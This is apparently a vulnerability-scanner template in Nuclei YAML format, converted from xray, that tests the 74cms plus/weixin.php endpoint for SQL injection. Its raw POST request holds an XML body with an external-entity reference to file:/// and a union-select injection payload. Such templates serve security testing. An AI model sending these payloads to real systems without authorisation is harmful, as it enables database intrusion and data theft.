id: poc-yaml-74cms-weixin-php-sqli

info:
  name: poc-yaml-74cms-weixin-php-sqli
  author: betta(https://github.com/betta-cyber)
  severity: high
  tags: xray-converted,sqli
  reference:
    - http://cn-sec.com/archives/25900.html

http:
  - raw:
      - |
        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand_int(1000, 9999)}})#</Content></xml>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200